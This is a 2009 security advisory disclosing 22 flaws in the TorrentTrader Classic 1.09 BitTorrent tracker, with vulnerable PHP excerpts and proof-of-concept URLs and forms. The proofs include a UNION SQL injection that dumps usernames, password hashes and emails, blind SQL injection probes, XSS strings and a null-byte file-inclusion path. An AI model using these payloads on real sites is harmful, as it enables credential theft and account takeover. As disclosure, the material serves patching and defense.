TorrentTrader Classic 1.09 SQL Injection

2009-06-15T00:00:00
ID PACKETSTORM:78408
Type packetstorm
Reporter Janek Vind aka waraxe
Modified 2009-06-15T00:00:00

Description

                                        
                                            `[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09  
===============================================================================  
  
Author: Janek Vind "waraxe"  
Date: 15. June 2009  
Location: Estonia, Tartu  
Web: http://www.waraxe.us/advisory-74.html  
  
  
Description of vulnerable software:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
TorrentTrader is a feature packed and highly customisable PHP/MySQL Based  
BitTorrent tracker. Featuring integrated forums and plenty of administration  
options. Please visit www.torrenttrader.org for the support forums.  
  
http://sourceforge.net/projects/torrenttrader   
  
  
List of found vulnerabilities  
===============================================================================  
  
1. Sql Injection vulnerability in "account-inbox.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. unsanitized user submitted parameter "origmsg" is used in sql query  
Preconditions:  
1. attacker must be logged in as valid user  
  
Test:  
  
http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes  
  
Result: "MYSQL Error has occurred!"  
  
-----------------------------[source code start]-------------------------------  
if ($msg) {  
$msg = trim($msg);  
  
$res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver)."");  
$user = mysql_fetch_assoc($res);  
if (!$user)  
$message = "Username not found.";  
...  
  
if ($origmsg && $delete == "yes")  
mysql_query("DELETE FROM messages WHERE id=$origmsg") or sqlerr();  
-----------------------------[source code end]---------------------------------  
  
  
2. Weak password generation algorithm in "account-recover.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. generated password is weak and can be easily bruteforced  
Preconditions:  
1. attacker must know email address associated with target's account  
  
Torrenttrader contains password reseting functionality:  
  
http://localhost/torrenttrader109/account-recover.php  
  
Anyone can initiate password reset, only condition is, that target's email  
address must be know. Torrenttrader will check email address and after successful  
validation new, temporal password will be generated and sent to that email address.  
Specific autogenerated password appears to be random number between 10000 and 50000,  
so basically there can be only 40000 possible temporal passwords. It's easy to  
write bruteforce script, which will try all possible password combinations.  
This process can take couple of hours or more, but eventually the password will  
be guessed and target account becomes compromised.  
  
-----------------------------[source code start]-------------------------------  
if ($HTTP_SERVER_VARS["REQUEST_METHOD"] == "POST") {  
$email = trim($_POST["email"]);  
if (!validemail($email)) {  
$msg = "" . NOT_VAILD_EMAIL . "";  
$kind = "Error";  
}  
else {  
$res = mysql_query("SELECT * FROM users WHERE email=" . sqlesc($email) . " LIMIT 1");  
$arr = mysql_fetch_assoc($res);  
  
if (!$arr) {  
$msg = "" . EMAIL_INVALID . "";  
$kind = "Error";  
}  
...  
if ($arr) {  
$newpassword = rand(10000, 50000);  
$md5pass = md5($newpassword);  
-----------------------------[source code end]---------------------------------  
  
  
3. Unauthorized database backup vulnerability in "backup-database.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. missing access control  
Preconditions:  
1. mysqldump utility must be available  
2. gzip utility must be available  
3. target directory must be writable  
4. database name must be known in order to successfully guess archive filename  
  
Test:  
  
http://localhost/torrenttrader109/backup-database.php  
  
Resulting message: "Database backup successful, entry inserted into database."  
  
-----------------------------[source code start]-------------------------------  
system(sprintf(   
'mysqldump --opt -h %s -u %s -p%s %s | gzip > %s/%s/%s-%s-%s-%s.gz',   
$host,  
$user,  
$pass,  
$db,  
getenv('DOCUMENT_ROOT'),  
$backupdir,  
$db,  
$day,  
$month,  
$year  
));   
-----------------------------[source code end]---------------------------------  
  
Attacker is able to create database backup and resulting "gz" archive's  
filename can be guessed, if attacker knows database name. This file is also  
directly downloadable from website. Example download URI:  
  
http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz  
  
As result information leakage exists. For example, attacker can fetch admin  
credentials from backed up database.  
  
  
4. Sql Injection vulnerability in "browse.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. uninitialized variable "wherecatin" is used in sql query  
Preconditions:  
1. none  
  
Test:  
  
http://localhost/torrenttrader109/browse.php?wherecatin=waraxe  
  
Result:  
  
Unknown column 'waraxe' in 'where clause'  
  
-----------------------------[source code start]-------------------------------  
if (count($wherecatina) > 1)  
$wherecatin = implode(",",$wherecatina);  
elseif (count($wherecatina) == 1)  
$wherea[] = "category = $wherecatina[0]";  
...  
if ($wherecatin)  
$where .= ($where ? " AND " : "") . "category IN(" . $wherecatin . ")";  
  
if ($where != "")  
$where = "WHERE $where";  
  
$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error());  
-----------------------------[source code end]---------------------------------  
  
This specific sql injection vulneraility can be exploited using blind attack  
methods. If there is one or more active torrents in database, then usable is  
attack pattern below:  
  
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1  
  
and we see found torrents.  
  
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1  
  
"No torrents were found based on your search criteria."  
  
In this way attacker is able to ask boolean questions from database and retrieve  
needed information bit by bit - example of classical blind sql injection.  
  
If there is no active torrents in database, then induced sql errors method can be used.  
  
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1  
  
"Subquery returns more than 1 row"  
  
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1  
  
"No torrents were found based on your search criteria."  
  
  
5. Information leakage in "check.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. missing access control  
Preconditions:  
1. none  
  
Test:  
  
http://localhost/torrenttrader109/check.php  
  
This script is originally meant to be used by installer and lately by admins.  
Because of lacking access control attacker is able to use it for gathering some  
useful information about target system - full path to webroot, file and directory  
permissions of specific files, couple of php settings.  
  
6. Sql Injection vulnerability in "delreq.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. unsanitized user submitted parameter "categ" is used in sql query  
Preconditions:  
1. attacker must have at least super moderator privileges (user class > 3)  
Comments:  
1. very easy to exploit  
  
Test:  
  
http://localhost/torrenttrader109/delreq.php?categ=waraxe  
  
Result:  
  
You have an error in your SQL syntax; check the manual that corresponds to your  
MySQL server version for the right syntax to use near  
'waraxe order by requests.request LIMIT 0,50' at line 1  
  
Test 2:  
  
http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+  
  
and we can see all usernames, password hashes and emails from database.  
  
  
7. Sql Injection vulnerability in "index.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. unsanitized user submitted parameter "choice" is used in sql query  
Preconditions:  
1. attacker must be logged in as valid user  
2. there must exist at least one poll  
  
Testing needs custom written html form:  
-------------------------------------------------------------------------------  
<html><body><center>  
<form action="http://localhost/torrenttrader109/index.php" method="post">  
<input type="hidden" name="choice" value="waraxe">  
<input type="submit" value="Test!">  
</form></center></body></html>  
-------------------------------------------------------------------------------  
  
Result: "MYSQL Error has occurred!"  
  
-----------------------------[source code start]-------------------------------  
if ($_SERVER["REQUEST_METHOD"] == "POST")  
{  
$choice = $_POST["choice"];  
if ($CURUSER && $choice != "" && $choice < 256 && $choice == floor($choice))  
{  
$res = mysql_query("SELECT * FROM polls ORDER BY added DESC LIMIT 1") or sqlerr();  
$arr = mysql_fetch_assoc($res) or die("No poll");  
$pollid = $arr["id"];  
$userid = $CURUSER["id"];  
$res = mysql_query("SELECT * FROM pollanswers WHERE pollid=$pollid && userid=$userid") or sqlerr();  
$arr = mysql_fetch_assoc($res);  
if ($arr) die("Dupe vote");  
mysql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr();  
-----------------------------[source code end]---------------------------------  
  
  
8. Sql Injection vulnerability in "modrules.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. unsanitized user submitted parameter "id" is used in sql query  
Preconditions:  
1. attacker must have at least moderator privileges  
  
Testing needs custom written html form:  
-------------------------------------------------------------------------------  
<html><body><center>  
<form action="http://localhost/torrenttrader109/modrules.php?act=edited" method="post">  
<input type="hidden" name="title" value="test">  
<input type="hidden" name="text" value="test">  
<input type="hidden" name="public" value="yes">  
<input type="hidden" name="class" value="0">  
<input type="hidden" name="id" value="1">  
<input type="submit" value="Test!">  
</form></center></body></html>  
-------------------------------------------------------------------------------  
  
Test result: "MYSQL Error has occurred!"  
  
-----------------------------[source code start]-------------------------------  
elseif ($_GET["act"]=="edited"){  
$id = $_POST["id"];  
$title = sqlesc($_POST["title"]);  
$text = sqlesc($_POST["text"]);  
$public = sqlesc($_POST["public"]);  
$class = sqlesc($_POST["class"]);  
mysql_query("update rules set title=$title, text=$text, public=$public,  
class=$class where id=$id") or sqlerr(__FILE__,__LINE__);  
-----------------------------[source code end]---------------------------------  
  
  
9. Information leakage in "phpinfo.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. missing access control  
Preconditions:  
1. none  
  
Test:  
  
http://localhost/torrenttrader109/phpinfo.php  
  
-----------------------------[source code start]-------------------------------  
<?php  
phpinfo();  
?>  
-----------------------------[source code end]---------------------------------  
  
This script can be used by attacker to obtain information from php function  
phpinfo(). Access to such script must be limited to admins, but currently there  
is not any access control at all.  
  
  
10. Sql Injection vulnerabilities in "report.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. unsanitized user submitted parameter "user" is used in sql query  
2. unsanitized user submitted parameter "torrent" is used in sql query  
3. unsanitized user submitted parameter "forumid" is used in sql query  
4. unsanitized user submitted parameter "forumpost" is used in sql query  
Preconditions:  
1. attacker must be logged in as valid user  
  
Two proof-of-concept tests below are using parameter "user".  
  
Test 1 needs custom written html form:  
-------------------------------------------------------------------------------  
<html><body><center>  
<form action="http://localhost/torrenttrader109/report.php" method="post">  
<input type="hidden" name="reason" value="test">  
<input type="hidden" name="user" value="0 UNION SELECT IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),1)-- ">  
<input type="submit" value="Test!">  
</form></center></body></html>  
-------------------------------------------------------------------------------  
  
Test result: "MYSQL Error has occurred!"  
  
Test 2 needs custom written html form:  
-----------------------------[source code start]-------------------------------  
<html><body><center>  
<form action="http://localhost/torrenttrader109/report.php" method="post">  
<input type="hidden" name="reason" value="test">  
<input type="hidden" name="user" value="0 UNION SELECT IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),1)-- ">  
<input type="submit" value="Test!">  
</form></center></body></html>  
-----------------------------[source code end]---------------------------------  
  
Test result: "You have already reported user ..."  
  
It's classical blind sql injection exploitation method and allows attacker to  
fetch information from database bit by bit by asking boolean questions.  
  
Other three sql injection vulnerabilities in "report.php" involve user submitted  
parameters "torrent", "forumid" and "forumpost" and exploitation can be done in  
similar way as seen above.  
  
  
11. Sql Injection vulnerability in "take-deletepm.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. unsanitized user submitted parameter "delmp" is used in sql query  
Preconditions:  
1. attacker must have admin privileges  
  
-----------------------------[source code start]-------------------------------  
if(isset($_POST["delmp"])) {  
$do="DELETE FROM messages WHERE id IN (" . implode(", ", $_POST[delmp]) . ")";  
$res=mysql_query($do)  
-----------------------------[source code end]---------------------------------  
  
  
12. Sql Injection vulnerability in "takedelreport.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. unsanitized user submitted parameter "delreport" is used in sql query  
Preconditions:  
1. attacker must have at least moderator privileges  
  
-----------------------------[source code start]-------------------------------  
jmodonly();  
  
$res = mysql_query ("SELECT id FROM reports WHERE dealtwith=0   
AND id IN (" . implode(", ", $_POST[delreport]) . ")");  
-----------------------------[source code end]---------------------------------  
  
  
13. Sql Injection vulnerability in "takedelreq.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. unsanitized user submitted parameter "delreq" is used in sql query  
Preconditions:  
1. attacker must be logged in as valid user  
  
-----------------------------[source code start]-------------------------------  
if (get_user_class() > UC_JMODERATOR){  
...  
$do="DELETE FROM requests WHERE id IN (" . implode(", ", $_POST[delreq]) . ")";  
$do2="DELETE FROM addedrequests WHERE requestid IN (" . implode(", ", $_POST[delreq]) . ")";  
$res2=mysql_query($do2);  
$res=mysql_query($do);  
...  
} else {  
foreach ($_POST[delreq] as $del_req){  
$delete_ok = checkRequestOwnership($CURUSER[id],$del_req);  
if ($delete_ok){  
$do="DELETE FROM requests WHERE id IN ($del_req)";  
$do2="DELETE FROM addedrequests WHERE requestid IN ($del_req)";  
...  
function checkRequestOwnership ($user, $delete_req){  
$query = mysql_query("SELECT * FROM requests WHERE userid=$user AND id = $delete_req") or sqlerr();  
-----------------------------[source code end]---------------------------------  
  
  
  
14. Sql Injection vulnerability in "takestaffmess.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. unsanitized user submitted parameter "clases" is used in sql query  
Preconditions:  
1. attacker must have admin privileges  
  
-----------------------------[source code start]-------------------------------  
adminonly();  
...  
$updateset = $_POST['clases'];  
  
$query = mysql_query("SELECT id FROM users WHERE class IN (".implode(",", $updateset).")");  
-----------------------------[source code end]---------------------------------  
  
  
15. Sql Injection vulnerability in "takewarndisable.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. unsanitized user submitted parameter "warndisable" is used in sql query  
Preconditions:  
1. attacker must have at least moderator privileges  
  
-----------------------------[source code start]-------------------------------  
jmodonly();  
...  
if ($disable != '') {  
$do="UPDATE users SET enabled='no' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";  
$res=mysql_query($do);  
}  
  
if ($enable != '') {  
$do = "UPDATE users SET enabled='yes' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";  
$res = mysql_query($do);  
}  
-----------------------------[source code end]---------------------------------  
  
  
16. Sql Injection vulnerability in "today.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. uninitialized variable "limit" is used in sql query  
Preconditions:  
1. none  
Comments:  
1. seems hard to exploit  
  
Test:  
  
http://localhost/torrenttrader109/today.php?limit=waraxe  
  
Result:   
  
"Warning: mysql_num_rows(): supplied argument is not a valid MySQL result  
resource in C:\apache_wwwroot\torrenttrader109\today.php on line 21"  
  
  
17. Sql Injection vulnerability in "torrents-details.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. uninitialized variable "where" is used in sql query  
Preconditions:  
1. none  
  
-----------------------------[source code start]-------------------------------  
//speed mod  
$resSpeed = mysql_query("SELECT seeders,leechers FROM torrents  
WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15")  
or sqlerr(__FILE__, __LINE__);   
-----------------------------[source code end]---------------------------------  
  
Exploitation is possible using blind sql injection methods.  
  
Test 1:  
  
http://localhost/torrenttrader109/torrents-details.php?id=1&  
where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+  
  
Result: normal page  
  
Test 2:  
  
http://localhost/torrenttrader109/torrents-details.php?id=1&  
where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+  
  
Result: "MYSQL Error has occurred!"  
  
  
18. Sql Injection vulnerability in "admin-delreq.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. uninitialized variable "categ" is used in sql query  
Preconditions:  
1. attacker must have at least moderator privileges  
  
-----------------------------[source code start]-------------------------------  
jmodonly();  
...  
$res=mysql_query("SELECT users.username, requests.filled, requests.filledby,  
requests.id, requests.userid, requests.request, requests.added, categories.name  
as cat FROM requests inner join categories on requests.cat = categories.id  
inner join users on requests.userid = users.id  
$categ order by requests.request $limit") or print(mysql_error());  
-----------------------------[source code end]---------------------------------  
  
Test:  
  
http://localhost/torrenttrader109/admin-delreq.php?categ=waraxe  
  
Result: "You have an error in your SQL syntax; check the manual that corresponds  
to your MySQL server version for the right syntax to use  
near 'waraxe order by requests.request LIMIT 0,50' at line 1"  
  
  
19. Persistent XSS in "viewrequests.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. unsanitized user submitted parameters used in response html generation  
Preconditions:  
1. attacker must be logged in as valid user  
  
Steps for testing:  
  
a) attacker submits request:  
  
http://localhost/torrenttrader109/requests.php  
  
In "Title" field let's insert some javascript:  
  
testtitle<script>alert(123);</script>  
  
b) admin will browse requests:  
  
http://localhost/torrenttrader109/viewrequests.php  
  
and previously planted javascript will be executed in admin session context.  
  
  
  
20. Persistent XSS in logging funtionality  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. unsanitized user submitted parameters used in response html generation  
Preconditions:  
1. attacker must be logged in as valid user  
  
Steps for testing:  
  
a) attacker uploads torrent file:  
  
http://localhost/torrenttrader109/torrents-upload.php  
  
In "Torrent Name" field let's insert some javascript:  
  
testname<script>alert(123);</script>  
  
Upload is successful: "The torrent has been uploaded successfully!"  
  
b) admin will browse logs:  
  
http://localhost/torrenttrader109/admin.php?act=view_log  
  
and previously planted javascript will be executed in admin session context.  
  
  
21. Local File Inclusion vulnerability in "backend/admin-functions.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Reasons:  
1. URI case-insensitivity on Windows platform  
Preconditions:  
1. Windows platform  
2. register_globals=on  
3. magic_quotes_gpc=off  
  
-----------------------------[source code start]-------------------------------  
if (strpos($_SERVER['REQUEST_URI'], "admin-functions.php") !== false) die;  
require_once("./themes/" . $GLOBALS['ss_uri'] . "/block.php");  
-----------------------------[source code end]---------------------------------  
  
As we can see from source code snippet above, direct access to script is blocked.  
In case of Windows and Apache combination URI handling is case-insensitive.  
In other hand "strpos()" function, used for access control, is case-sensitive.  
So this script can be directly executed, if we change some characters in script's  
filename to uppercase:  
  
http://localhost/torrenttrader109/backend/Admin-functions.php  
  
"Warning: require_once(./themes//block.php) [function.require-once]:  
failed to open stream: No such file or directory in  
C:\apache_wwwroot\torrenttrader109\backend\admin-functions.php on line 3"  
  
If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible:  
  
http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00  
  
  
22. Reflected XSS in multiple scripts  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Examples:  
  
http://localhost/torrenttrader109/themes/default/footer.php?ttversion=<script>alert(123);</script>  
http://localhost/torrenttrader109/themes/default/header.php?SITENAME="><script>alert(123);</script>  
http://localhost/torrenttrader109/themes/default/header.php?CURUSER[username]=<script>alert(123);</script>  
http://localhost/torrenttrader109/visitorstoday.php?todayactive=<script>alert(123);</script>  
http://localhost/torrenttrader109/visitorsnow.php?activepeople=<script>alert(123);</script>  
http://localhost/torrenttrader109/faq.php?faq_categ[999][title]=<script>alert(123);</script>&faq_categ[999][flag]=1  
http://localhost/torrenttrader109/torrents-details.php?id=1&keepget="><script>alert(123);</script>  
  
  
Greetings:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,  
to all active waraxe.us forum members and to anyone else who know me!  
  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
come2waraxe@yahoo.com  
Janek Vind "waraxe"  
  
Waraxe forum: http://www.waraxe.us/forums.html  
Personal homepage: http://www.janekvind.com/  
---------------------------------- [ EOF ] ------------------------------------  
`